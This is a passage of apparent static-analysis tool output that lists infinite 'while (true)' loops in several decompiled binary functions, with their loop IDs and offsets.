++++++++ WHILE START : 12396 
++++++++ WHILE FUNCTION : function_804fd76 
++++++++ WHILE END : 14375 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 31 @ function_80505a5 ====================================
++++++++ WHILE START : 15705 
++++++++ WHILE FUNCTION : function_80505a5 
++++++++ WHILE END : 15827 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 40 @ function_80519a8 ====================================
++++++++ WHILE START : 21438 
++++++++ WHILE FUNCTION : function_80519a8 
++++++++ WHILE END : 21505 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 49 @ function_8052424 ====================================
++++++++ WHILE START : 22508 
++++++++ WHILE FUNCTION : function_8052424 
++++++++ WHILE END : 22555 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 50 @ function_805244c ====================================
++++++++ WHILE START : 22648 
++++++++ WHILE FUNCTION : function_805244c 
++++++++ WHILE END : 22742 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 53 @ function_8052784 ====================================
++++++++ WHILE START : 23279 
++++++++ WHILE FUNCTION : function_8052784 
++++++++ WHILE END : 23327 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
